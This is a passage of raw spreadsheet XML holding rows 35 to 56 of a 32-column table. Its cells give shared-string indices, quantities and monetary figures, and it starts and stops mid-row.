      <c r="AD34" s="97"/>
      <c r="AE34" s="97"/>
      <c r="AF34" s="97"/>
    </row>
    <row r="35" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A35" s="93"/>
      <c r="B35" s="88">
        <v>29</v>
      </c>
      <c r="C35" s="243" t="s">
        <v>3992</v>
      </c>
      <c r="D35" s="256" t="s">
        <v>3993</v>
      </c>
      <c r="E35" s="243" t="s">
        <v>3994</v>
      </c>
      <c r="F35" s="89"/>
      <c r="G35" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H35" s="94">
        <v>1</v>
      </c>
      <c r="I35" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J35" s="98">
        <v>235000</v>
      </c>
      <c r="K35" s="99">
        <v>45120</v>
      </c>
      <c r="L35" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M35" s="97"/>
      <c r="N35" s="97"/>
      <c r="O35" s="97"/>
      <c r="P35" s="97"/>
      <c r="Q35" s="97"/>
      <c r="R35" s="97"/>
      <c r="S35" s="97"/>
      <c r="T35" s="97"/>
      <c r="U35" s="97"/>
      <c r="V35" s="97"/>
      <c r="W35" s="97"/>
      <c r="X35" s="97"/>
      <c r="Y35" s="97"/>
      <c r="Z35" s="97"/>
      <c r="AA35" s="97"/>
      <c r="AB35" s="97"/>
      <c r="AC35" s="97"/>
      <c r="AD35" s="97"/>
      <c r="AE35" s="97"/>
      <c r="AF35" s="97"/>
    </row>
    <row r="36" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A36" s="93"/>
      <c r="B36" s="88">
        <v>30</v>
      </c>
      <c r="C36" s="243" t="s">
        <v>3995</v>
      </c>
      <c r="D36" s="256" t="s">
        <v>1273</v>
      </c>
      <c r="E36" s="243" t="s">
        <v>3996</v>
      </c>
      <c r="F36" s="89"/>
      <c r="G36" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H36" s="94">
        <v>2</v>
      </c>
      <c r="I36" s="243" t="s">
        <v>962</v>
      </c>
      <c r="J36" s="98">
        <v>59600</v>
      </c>
      <c r="K36" s="99">
        <v>11443.2</v>
      </c>
      <c r="L36" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M36" s="97"/>
      <c r="N36" s="97"/>
      <c r="O36" s="97"/>
      <c r="P36" s="97"/>
      <c r="Q36" s="97"/>
      <c r="R36" s="97"/>
      <c r="S36" s="97"/>
      <c r="T36" s="97"/>
      <c r="U36" s="97"/>
      <c r="V36" s="97"/>
      <c r="W36" s="97"/>
      <c r="X36" s="97"/>
      <c r="Y36" s="97"/>
      <c r="Z36" s="97"/>
      <c r="AA36" s="97"/>
      <c r="AB36" s="97"/>
      <c r="AC36" s="97"/>
      <c r="AD36" s="97"/>
      <c r="AE36" s="97"/>
      <c r="AF36" s="97"/>
    </row>
    <row r="37" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A37" s="93"/>
      <c r="B37" s="88">
        <v>31</v>
      </c>
      <c r="C37" s="243" t="s">
        <v>3997</v>
      </c>
      <c r="D37" s="256" t="s">
        <v>331</v>
      </c>
      <c r="E37" s="243" t="s">
        <v>3998</v>
      </c>
      <c r="F37" s="89"/>
      <c r="G37" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H37" s="94">
        <v>1</v>
      </c>
      <c r="I37" s="243" t="s">
        <v>962</v>
      </c>
      <c r="J37" s="98">
        <v>26500</v>
      </c>
      <c r="K37" s="99">
        <v>2756</v>
      </c>
      <c r="L37" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M37" s="97"/>
      <c r="N37" s="97"/>
      <c r="O37" s="97"/>
      <c r="P37" s="97"/>
      <c r="Q37" s="97"/>
      <c r="R37" s="97"/>
      <c r="S37" s="97"/>
      <c r="T37" s="97"/>
      <c r="U37" s="97"/>
      <c r="V37" s="97"/>
      <c r="W37" s="97"/>
      <c r="X37" s="97"/>
      <c r="Y37" s="97"/>
      <c r="Z37" s="97"/>
      <c r="AA37" s="97"/>
      <c r="AB37" s="97"/>
      <c r="AC37" s="97"/>
      <c r="AD37" s="97"/>
      <c r="AE37" s="97"/>
      <c r="AF37" s="97"/>
    </row>
    <row r="38" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A38" s="93"/>
      <c r="B38" s="88">
        <v>32</v>
      </c>
      <c r="C38" s="243" t="s">
        <v>3999</v>
      </c>
      <c r="D38" s="256" t="s">
        <v>4000</v>
      </c>
      <c r="E38" s="243" t="s">
        <v>3353</v>
      </c>
      <c r="F38" s="89"/>
      <c r="G38" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H38" s="94">
        <v>1</v>
      </c>
      <c r="I38" s="243" t="s">
        <v>962</v>
      </c>
      <c r="J38" s="98">
        <v>39672</v>
      </c>
      <c r="K38" s="99">
        <v>7603.2</v>
      </c>
      <c r="L38" s="256" t="s">
        <v>4001</v>
      </c>
      <c r="M38" s="97"/>
      <c r="N38" s="97"/>
      <c r="O38" s="97"/>
      <c r="P38" s="97"/>
      <c r="Q38" s="97"/>
      <c r="R38" s="97"/>
      <c r="S38" s="97"/>
      <c r="T38" s="97"/>
      <c r="U38" s="97"/>
      <c r="V38" s="97"/>
      <c r="W38" s="97"/>
      <c r="X38" s="97"/>
      <c r="Y38" s="97"/>
      <c r="Z38" s="97"/>
      <c r="AA38" s="97"/>
      <c r="AB38" s="97"/>
      <c r="AC38" s="97"/>
      <c r="AD38" s="97"/>
      <c r="AE38" s="97"/>
      <c r="AF38" s="97"/>
    </row>
    <row r="39" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A39" s="93"/>
      <c r="B39" s="88">
        <v>33</v>
      </c>
      <c r="C39" s="237" t="s">
        <v>4002</v>
      </c>
      <c r="D39" s="239" t="s">
        <v>4003</v>
      </c>
      <c r="E39" s="237" t="s">
        <v>4004</v>
      </c>
      <c r="F39" s="89"/>
      <c r="G39" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H39" s="11">
        <v>1</v>
      </c>
      <c r="I39" s="237" t="s">
        <v>1497</v>
      </c>
      <c r="J39" s="100">
        <v>94338.28</v>
      </c>
      <c r="K39" s="99">
        <v>3772</v>
      </c>
      <c r="L39" s="239" t="s">
        <v>4005</v>
      </c>
      <c r="M39" s="97"/>
      <c r="N39" s="97"/>
      <c r="O39" s="97"/>
      <c r="P39" s="97"/>
      <c r="Q39" s="97"/>
      <c r="R39" s="97"/>
      <c r="S39" s="97"/>
      <c r="T39" s="97"/>
      <c r="U39" s="97"/>
      <c r="V39" s="97"/>
      <c r="W39" s="97"/>
      <c r="X39" s="97"/>
      <c r="Y39" s="97"/>
      <c r="Z39" s="97"/>
      <c r="AA39" s="97"/>
      <c r="AB39" s="97"/>
      <c r="AC39" s="97"/>
      <c r="AD39" s="97"/>
      <c r="AE39" s="97"/>
      <c r="AF39" s="97"/>
    </row>
    <row r="40" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A40" s="93"/>
      <c r="B40" s="88">
        <v>34</v>
      </c>
      <c r="C40" s="243" t="s">
        <v>4006</v>
      </c>
      <c r="D40" s="256" t="s">
        <v>4007</v>
      </c>
      <c r="E40" s="243" t="s">
        <v>4008</v>
      </c>
      <c r="F40" s="89"/>
      <c r="G40" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H40" s="94">
        <v>1</v>
      </c>
      <c r="I40" s="243" t="s">
        <v>871</v>
      </c>
      <c r="J40" s="98">
        <v>840000</v>
      </c>
      <c r="K40" s="99">
        <v>161280</v>
      </c>
      <c r="L40" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M40" s="97"/>
      <c r="N40" s="97"/>
      <c r="O40" s="97"/>
      <c r="P40" s="97"/>
      <c r="Q40" s="97"/>
      <c r="R40" s="97"/>
      <c r="S40" s="97"/>
      <c r="T40" s="97"/>
      <c r="U40" s="97"/>
      <c r="V40" s="97"/>
      <c r="W40" s="97"/>
      <c r="X40" s="97"/>
      <c r="Y40" s="97"/>
      <c r="Z40" s="97"/>
      <c r="AA40" s="97"/>
      <c r="AB40" s="97"/>
      <c r="AC40" s="97"/>
      <c r="AD40" s="97"/>
      <c r="AE40" s="97"/>
      <c r="AF40" s="97"/>
    </row>
    <row r="41" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A41" s="93"/>
      <c r="B41" s="88">
        <v>35</v>
      </c>
      <c r="C41" s="243" t="s">
        <v>4009</v>
      </c>
      <c r="D41" s="256" t="s">
        <v>4010</v>
      </c>
      <c r="E41" s="243" t="s">
        <v>4011</v>
      </c>
      <c r="F41" s="89"/>
      <c r="G41" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H41" s="94">
        <v>3</v>
      </c>
      <c r="I41" s="243" t="s">
        <v>871</v>
      </c>
      <c r="J41" s="98">
        <v>55275</v>
      </c>
      <c r="K41" s="99">
        <v>10598.4</v>
      </c>
      <c r="L41" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M41" s="97"/>
      <c r="N41" s="97"/>
      <c r="O41" s="97"/>
      <c r="P41" s="97"/>
      <c r="Q41" s="97"/>
      <c r="R41" s="97"/>
      <c r="S41" s="97"/>
      <c r="T41" s="97"/>
      <c r="U41" s="97"/>
      <c r="V41" s="97"/>
      <c r="W41" s="97"/>
      <c r="X41" s="97"/>
      <c r="Y41" s="97"/>
      <c r="Z41" s="97"/>
      <c r="AA41" s="97"/>
      <c r="AB41" s="97"/>
      <c r="AC41" s="97"/>
      <c r="AD41" s="97"/>
      <c r="AE41" s="97"/>
      <c r="AF41" s="97"/>
    </row>
    <row r="42" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A42" s="93"/>
      <c r="B42" s="88">
        <v>36</v>
      </c>
      <c r="C42" s="243" t="s">
        <v>4012</v>
      </c>
      <c r="D42" s="256" t="s">
        <v>4013</v>
      </c>
      <c r="E42" s="243" t="s">
        <v>4014</v>
      </c>
      <c r="F42" s="89"/>
      <c r="G42" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H42" s="94">
        <v>1</v>
      </c>
      <c r="I42" s="243" t="s">
        <v>871</v>
      </c>
      <c r="J42" s="98">
        <v>5850</v>
      </c>
      <c r="K42" s="99">
        <v>1123.2</v>
      </c>
      <c r="L42" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M42" s="97"/>
      <c r="N42" s="97"/>
      <c r="O42" s="97"/>
      <c r="P42" s="97"/>
      <c r="Q42" s="97"/>
      <c r="R42" s="97"/>
      <c r="S42" s="97"/>
      <c r="T42" s="97"/>
      <c r="U42" s="97"/>
      <c r="V42" s="97"/>
      <c r="W42" s="97"/>
      <c r="X42" s="97"/>
      <c r="Y42" s="97"/>
      <c r="Z42" s="97"/>
      <c r="AA42" s="97"/>
      <c r="AB42" s="97"/>
      <c r="AC42" s="97"/>
      <c r="AD42" s="97"/>
      <c r="AE42" s="97"/>
      <c r="AF42" s="97"/>
    </row>
    <row r="43" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A43" s="93"/>
      <c r="B43" s="88">
        <v>37</v>
      </c>
      <c r="C43" s="243" t="s">
        <v>4015</v>
      </c>
      <c r="D43" s="256" t="s">
        <v>2892</v>
      </c>
      <c r="E43" s="243" t="s">
        <v>4016</v>
      </c>
      <c r="F43" s="89"/>
      <c r="G43" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H43" s="94">
        <v>2</v>
      </c>
      <c r="I43" s="243" t="s">
        <v>310</v>
      </c>
      <c r="J43" s="98">
        <v>320000</v>
      </c>
      <c r="K43" s="99">
        <v>51200</v>
      </c>
      <c r="L43" s="95"/>
      <c r="M43" s="97"/>
      <c r="N43" s="97"/>
      <c r="O43" s="97"/>
      <c r="P43" s="97"/>
      <c r="Q43" s="97"/>
      <c r="R43" s="97"/>
      <c r="S43" s="97"/>
      <c r="T43" s="97"/>
      <c r="U43" s="97"/>
      <c r="V43" s="97"/>
      <c r="W43" s="97"/>
      <c r="X43" s="97"/>
      <c r="Y43" s="97"/>
      <c r="Z43" s="97"/>
      <c r="AA43" s="97"/>
      <c r="AB43" s="97"/>
      <c r="AC43" s="97"/>
      <c r="AD43" s="97"/>
      <c r="AE43" s="97"/>
      <c r="AF43" s="97"/>
    </row>
    <row r="44" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A44" s="93"/>
      <c r="B44" s="88">
        <v>38</v>
      </c>
      <c r="C44" s="243" t="s">
        <v>4017</v>
      </c>
      <c r="D44" s="256" t="s">
        <v>4018</v>
      </c>
      <c r="E44" s="243" t="s">
        <v>4019</v>
      </c>
      <c r="F44" s="89"/>
      <c r="G44" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H44" s="94">
        <v>1</v>
      </c>
      <c r="I44" s="243" t="s">
        <v>326</v>
      </c>
      <c r="J44" s="98">
        <v>1202800</v>
      </c>
      <c r="K44" s="99">
        <v>288672</v>
      </c>
      <c r="L44" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M44" s="97"/>
      <c r="N44" s="97"/>
      <c r="O44" s="97"/>
      <c r="P44" s="97"/>
      <c r="Q44" s="97"/>
      <c r="R44" s="97"/>
      <c r="S44" s="97"/>
      <c r="T44" s="97"/>
      <c r="U44" s="97"/>
      <c r="V44" s="97"/>
      <c r="W44" s="97"/>
      <c r="X44" s="97"/>
      <c r="Y44" s="97"/>
      <c r="Z44" s="97"/>
      <c r="AA44" s="97"/>
      <c r="AB44" s="97"/>
      <c r="AC44" s="97"/>
      <c r="AD44" s="97"/>
      <c r="AE44" s="97"/>
      <c r="AF44" s="97"/>
    </row>
    <row r="45" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A45" s="93"/>
      <c r="B45" s="88">
        <v>39</v>
      </c>
      <c r="C45" s="243" t="s">
        <v>4020</v>
      </c>
      <c r="D45" s="256" t="s">
        <v>4021</v>
      </c>
      <c r="E45" s="243" t="s">
        <v>4022</v>
      </c>
      <c r="F45" s="89"/>
      <c r="G45" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H45" s="94">
        <v>1</v>
      </c>
      <c r="I45" s="243" t="s">
        <v>326</v>
      </c>
      <c r="J45" s="98">
        <v>453250</v>
      </c>
      <c r="K45" s="99">
        <v>108768</v>
      </c>
      <c r="L45" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M45" s="97"/>
      <c r="N45" s="97"/>
      <c r="O45" s="97"/>
      <c r="P45" s="97"/>
      <c r="Q45" s="97"/>
      <c r="R45" s="97"/>
      <c r="S45" s="97"/>
      <c r="T45" s="97"/>
      <c r="U45" s="97"/>
      <c r="V45" s="97"/>
      <c r="W45" s="97"/>
      <c r="X45" s="97"/>
      <c r="Y45" s="97"/>
      <c r="Z45" s="97"/>
      <c r="AA45" s="97"/>
      <c r="AB45" s="97"/>
      <c r="AC45" s="97"/>
      <c r="AD45" s="97"/>
      <c r="AE45" s="97"/>
      <c r="AF45" s="97"/>
    </row>
    <row r="46" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A46" s="93"/>
      <c r="B46" s="88">
        <v>40</v>
      </c>
      <c r="C46" s="243" t="s">
        <v>4023</v>
      </c>
      <c r="D46" s="256" t="s">
        <v>4024</v>
      </c>
      <c r="E46" s="243" t="s">
        <v>4025</v>
      </c>
      <c r="F46" s="89"/>
      <c r="G46" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H46" s="94">
        <v>1</v>
      </c>
      <c r="I46" s="243" t="s">
        <v>326</v>
      </c>
      <c r="J46" s="98">
        <v>518200</v>
      </c>
      <c r="K46" s="99">
        <v>124368</v>
      </c>
      <c r="L46" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M46" s="97"/>
      <c r="N46" s="97"/>
      <c r="O46" s="97"/>
      <c r="P46" s="97"/>
      <c r="Q46" s="97"/>
      <c r="R46" s="97"/>
      <c r="S46" s="97"/>
      <c r="T46" s="97"/>
      <c r="U46" s="97"/>
      <c r="V46" s="97"/>
      <c r="W46" s="97"/>
      <c r="X46" s="97"/>
      <c r="Y46" s="97"/>
      <c r="Z46" s="97"/>
      <c r="AA46" s="97"/>
      <c r="AB46" s="97"/>
      <c r="AC46" s="97"/>
      <c r="AD46" s="97"/>
      <c r="AE46" s="97"/>
      <c r="AF46" s="97"/>
    </row>
    <row r="47" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A47" s="93"/>
      <c r="B47" s="88">
        <v>41</v>
      </c>
      <c r="C47" s="243" t="s">
        <v>4026</v>
      </c>
      <c r="D47" s="256" t="s">
        <v>4027</v>
      </c>
      <c r="E47" s="243" t="s">
        <v>4028</v>
      </c>
      <c r="F47" s="89"/>
      <c r="G47" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H47" s="94">
        <v>2</v>
      </c>
      <c r="I47" s="243" t="s">
        <v>326</v>
      </c>
      <c r="J47" s="98">
        <v>487200</v>
      </c>
      <c r="K47" s="99">
        <v>116928</v>
      </c>
      <c r="L47" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M47" s="97"/>
      <c r="N47" s="97"/>
      <c r="O47" s="97"/>
      <c r="P47" s="97"/>
      <c r="Q47" s="97"/>
      <c r="R47" s="97"/>
      <c r="S47" s="97"/>
      <c r="T47" s="97"/>
      <c r="U47" s="97"/>
      <c r="V47" s="97"/>
      <c r="W47" s="97"/>
      <c r="X47" s="97"/>
      <c r="Y47" s="97"/>
      <c r="Z47" s="97"/>
      <c r="AA47" s="97"/>
      <c r="AB47" s="97"/>
      <c r="AC47" s="97"/>
      <c r="AD47" s="97"/>
      <c r="AE47" s="97"/>
      <c r="AF47" s="97"/>
    </row>
    <row r="48" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A48" s="93"/>
      <c r="B48" s="88">
        <v>42</v>
      </c>
      <c r="C48" s="243" t="s">
        <v>4029</v>
      </c>
      <c r="D48" s="256" t="s">
        <v>2798</v>
      </c>
      <c r="E48" s="243" t="s">
        <v>4030</v>
      </c>
      <c r="F48" s="89"/>
      <c r="G48" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H48" s="94">
        <v>1</v>
      </c>
      <c r="I48" s="243" t="s">
        <v>1079</v>
      </c>
      <c r="J48" s="98">
        <v>420000</v>
      </c>
      <c r="K48" s="99">
        <v>100800</v>
      </c>
      <c r="L48" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M48" s="97"/>
      <c r="N48" s="97"/>
      <c r="O48" s="97"/>
      <c r="P48" s="97"/>
      <c r="Q48" s="97"/>
      <c r="R48" s="97"/>
      <c r="S48" s="97"/>
      <c r="T48" s="97"/>
      <c r="U48" s="97"/>
      <c r="V48" s="97"/>
      <c r="W48" s="97"/>
      <c r="X48" s="97"/>
      <c r="Y48" s="97"/>
      <c r="Z48" s="97"/>
      <c r="AA48" s="97"/>
      <c r="AB48" s="97"/>
      <c r="AC48" s="97"/>
      <c r="AD48" s="97"/>
      <c r="AE48" s="97"/>
      <c r="AF48" s="97"/>
    </row>
    <row r="49" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A49" s="93"/>
      <c r="B49" s="88">
        <v>43</v>
      </c>
      <c r="C49" s="243" t="s">
        <v>4031</v>
      </c>
      <c r="D49" s="256" t="s">
        <v>4007</v>
      </c>
      <c r="E49" s="243" t="s">
        <v>4032</v>
      </c>
      <c r="F49" s="89"/>
      <c r="G49" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H49" s="94">
        <v>1</v>
      </c>
      <c r="I49" s="243" t="s">
        <v>1100</v>
      </c>
      <c r="J49" s="98">
        <v>701461.23</v>
      </c>
      <c r="K49" s="99">
        <v>196392</v>
      </c>
      <c r="L49" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M49" s="97"/>
      <c r="N49" s="97"/>
      <c r="O49" s="97"/>
      <c r="P49" s="97"/>
      <c r="Q49" s="97"/>
      <c r="R49" s="97"/>
      <c r="S49" s="97"/>
      <c r="T49" s="97"/>
      <c r="U49" s="97"/>
      <c r="V49" s="97"/>
      <c r="W49" s="97"/>
      <c r="X49" s="97"/>
      <c r="Y49" s="97"/>
      <c r="Z49" s="97"/>
      <c r="AA49" s="97"/>
      <c r="AB49" s="97"/>
      <c r="AC49" s="97"/>
      <c r="AD49" s="97"/>
      <c r="AE49" s="97"/>
      <c r="AF49" s="97"/>
    </row>
    <row r="50" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A50" s="93"/>
      <c r="B50" s="88">
        <v>44</v>
      </c>
      <c r="C50" s="243" t="s">
        <v>4033</v>
      </c>
      <c r="D50" s="256" t="s">
        <v>4034</v>
      </c>
      <c r="E50" s="243" t="s">
        <v>4035</v>
      </c>
      <c r="F50" s="89"/>
      <c r="G50" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H50" s="94">
        <v>1</v>
      </c>
      <c r="I50" s="243" t="s">
        <v>1100</v>
      </c>
      <c r="J50" s="98">
        <v>30000</v>
      </c>
      <c r="K50" s="99">
        <v>8400</v>
      </c>
      <c r="L50" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M50" s="97"/>
      <c r="N50" s="97"/>
      <c r="O50" s="97"/>
      <c r="P50" s="97"/>
      <c r="Q50" s="97"/>
      <c r="R50" s="97"/>
      <c r="S50" s="97"/>
      <c r="T50" s="97"/>
      <c r="U50" s="97"/>
      <c r="V50" s="97"/>
      <c r="W50" s="97"/>
      <c r="X50" s="97"/>
      <c r="Y50" s="97"/>
      <c r="Z50" s="97"/>
      <c r="AA50" s="97"/>
      <c r="AB50" s="97"/>
      <c r="AC50" s="97"/>
      <c r="AD50" s="97"/>
      <c r="AE50" s="97"/>
      <c r="AF50" s="97"/>
    </row>
    <row r="51" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A51" s="93"/>
      <c r="B51" s="88">
        <v>45</v>
      </c>
      <c r="C51" s="243" t="s">
        <v>4036</v>
      </c>
      <c r="D51" s="256" t="s">
        <v>4037</v>
      </c>
      <c r="E51" s="243" t="s">
        <v>4038</v>
      </c>
      <c r="F51" s="89"/>
      <c r="G51" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H51" s="94">
        <v>1</v>
      </c>
      <c r="I51" s="243" t="s">
        <v>1100</v>
      </c>
      <c r="J51" s="98">
        <v>45000</v>
      </c>
      <c r="K51" s="99">
        <v>12600</v>
      </c>
      <c r="L51" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M51" s="97"/>
      <c r="N51" s="97"/>
      <c r="O51" s="97"/>
      <c r="P51" s="97"/>
      <c r="Q51" s="97"/>
      <c r="R51" s="97"/>
      <c r="S51" s="97"/>
      <c r="T51" s="97"/>
      <c r="U51" s="97"/>
      <c r="V51" s="97"/>
      <c r="W51" s="97"/>
      <c r="X51" s="97"/>
      <c r="Y51" s="97"/>
      <c r="Z51" s="97"/>
      <c r="AA51" s="97"/>
      <c r="AB51" s="97"/>
      <c r="AC51" s="97"/>
      <c r="AD51" s="97"/>
      <c r="AE51" s="97"/>
      <c r="AF51" s="97"/>
    </row>
    <row r="52" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A52" s="93"/>
      <c r="B52" s="88">
        <v>46</v>
      </c>
      <c r="C52" s="243" t="s">
        <v>4039</v>
      </c>
      <c r="D52" s="256" t="s">
        <v>4040</v>
      </c>
      <c r="E52" s="243" t="s">
        <v>3188</v>
      </c>
      <c r="F52" s="89"/>
      <c r="G52" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H52" s="94">
        <v>1</v>
      </c>
      <c r="I52" s="243" t="s">
        <v>1100</v>
      </c>
      <c r="J52" s="98">
        <v>185000</v>
      </c>
      <c r="K52" s="99">
        <v>51800</v>
      </c>
      <c r="L52" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M52" s="97"/>
      <c r="N52" s="97"/>
      <c r="O52" s="97"/>
      <c r="P52" s="97"/>
      <c r="Q52" s="97"/>
      <c r="R52" s="97"/>
      <c r="S52" s="97"/>
      <c r="T52" s="97"/>
      <c r="U52" s="97"/>
      <c r="V52" s="97"/>
      <c r="W52" s="97"/>
      <c r="X52" s="97"/>
      <c r="Y52" s="97"/>
      <c r="Z52" s="97"/>
      <c r="AA52" s="97"/>
      <c r="AB52" s="97"/>
      <c r="AC52" s="97"/>
      <c r="AD52" s="97"/>
      <c r="AE52" s="97"/>
      <c r="AF52" s="97"/>
    </row>
    <row r="53" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A53" s="93"/>
      <c r="B53" s="88">
        <v>47</v>
      </c>
      <c r="C53" s="243" t="s">
        <v>4041</v>
      </c>
      <c r="D53" s="256" t="s">
        <v>4042</v>
      </c>
      <c r="E53" s="243" t="s">
        <v>3130</v>
      </c>
      <c r="F53" s="89"/>
      <c r="G53" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H53" s="94">
        <v>1</v>
      </c>
      <c r="I53" s="243" t="s">
        <v>1100</v>
      </c>
      <c r="J53" s="98">
        <v>1041461.23</v>
      </c>
      <c r="K53" s="99">
        <v>249936</v>
      </c>
      <c r="L53" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M53" s="97"/>
      <c r="N53" s="97"/>
      <c r="O53" s="97"/>
      <c r="P53" s="97"/>
      <c r="Q53" s="97"/>
      <c r="R53" s="97"/>
      <c r="S53" s="97"/>
      <c r="T53" s="97"/>
      <c r="U53" s="97"/>
      <c r="V53" s="97"/>
      <c r="W53" s="97"/>
      <c r="X53" s="97"/>
      <c r="Y53" s="97"/>
      <c r="Z53" s="97"/>
      <c r="AA53" s="97"/>
      <c r="AB53" s="97"/>
      <c r="AC53" s="97"/>
      <c r="AD53" s="97"/>
      <c r="AE53" s="97"/>
      <c r="AF53" s="97"/>
    </row>
    <row r="54" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A54" s="93"/>
      <c r="B54" s="88">
        <v>48</v>
      </c>
      <c r="C54" s="243" t="s">
        <v>4043</v>
      </c>
      <c r="D54" s="256" t="s">
        <v>4044</v>
      </c>
      <c r="E54" s="243" t="s">
        <v>555</v>
      </c>
      <c r="F54" s="89"/>
      <c r="G54" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H54" s="94">
        <v>1</v>
      </c>
      <c r="I54" s="243" t="s">
        <v>2152</v>
      </c>
      <c r="J54" s="98">
        <v>1668000</v>
      </c>
      <c r="K54" s="99">
        <v>467040</v>
      </c>
      <c r="L54" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M54" s="97"/>
      <c r="N54" s="97"/>
      <c r="O54" s="97"/>
      <c r="P54" s="97"/>
      <c r="Q54" s="97"/>
      <c r="R54" s="97"/>
      <c r="S54" s="97"/>
      <c r="T54" s="97"/>
      <c r="U54" s="97"/>
      <c r="V54" s="97"/>
      <c r="W54" s="97"/>
      <c r="X54" s="97"/>
      <c r="Y54" s="97"/>
      <c r="Z54" s="97"/>
      <c r="AA54" s="97"/>
      <c r="AB54" s="97"/>
      <c r="AC54" s="97"/>
      <c r="AD54" s="97"/>
      <c r="AE54" s="97"/>
      <c r="AF54" s="97"/>
    </row>
    <row r="55" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A55" s="93"/>
      <c r="B55" s="88">
        <v>49</v>
      </c>
      <c r="C55" s="243" t="s">
        <v>4045</v>
      </c>
      <c r="D55" s="256" t="s">
        <v>4046</v>
      </c>
      <c r="E55" s="243" t="s">
        <v>4047</v>
      </c>
      <c r="F55" s="89"/>
      <c r="G55" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H55" s="94">
        <v>1</v>
      </c>
      <c r="I55" s="243" t="s">
        <v>3194</v>
      </c>
      <c r="J55" s="98">
        <v>1766190</v>
      </c>
      <c r="K55" s="99">
        <v>494508</v>
      </c>
      <c r="L55" s="256" t="s">
        <v>2159</v>
      </c>
      <c r="M55" s="97"/>
      <c r="N55" s="97"/>
      <c r="O55" s="97"/>
      <c r="P55" s="97"/>
      <c r="Q55" s="97"/>
      <c r="R55" s="97"/>
      <c r="S55" s="97"/>
      <c r="T55" s="97"/>
      <c r="U55" s="97"/>
      <c r="V55" s="97"/>
      <c r="W55" s="97"/>
      <c r="X55" s="97"/>
      <c r="Y55" s="97"/>
      <c r="Z55" s="97"/>
      <c r="AA55" s="97"/>
      <c r="AB55" s="97"/>
      <c r="AC55" s="97"/>
      <c r="AD55" s="97"/>
      <c r="AE55" s="97"/>
      <c r="AF55" s="97"/>
    </row>
    <row r="56" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A56" s="93"/>
      <c r="B56" s="88">
        <v>50</v>
      </c>
      <c r="C56" s="243" t="s">
        <v>4048</v>
      </c>
      <c r="D56" s="256" t="s">
        <v>4049</v>
      </c>
      <c r="E56" s="243" t="s">
        <v>4050</v>
      </c>
      <c r="F56" s="89"/>
      <c r="G56" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H56" s="94">
        <v>1</v>
      </c>
      <c r="I56" s="243" t="s">
        <v>1670</v>
      </c>
      <c r="J56" s="98">
        <v>600000</v>
      </c>
      <c r="K56" s="99">
        <v>144000</v>
      </c>
      <c r="L56" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M56" s="97"/>
      <c r="N56" s="97"/>
      <c r="O56" s="97"/>
      <c r="P56" s="97"/>
      <c r="Q56" s="97"/>
      <c r="R56" s="97"/>
      <c r="S56" s="97"/>
      <c r="T56" s="97"/>
      <c r="U56" s="97"/>
      <c r="V56" s="97"/>
      <c r="W56" s="97"/>
      <c r="X56" s="97"/>
      <c r="Y56" s="97"/>
      <c r="Z56" s="97"/>
      <c r="AA56" s="97"/>
      <c r="AB56" s="97"/>
      <c r="AC56" s="97"/>
      <c r="AD56" s="97"/>
      <c r="AE56" s="97"/>
      <c r="AF56" s="97"/>
    </row>
    <row r="57" s="88" customFormat="1" customHeight="1" spans="1:32">
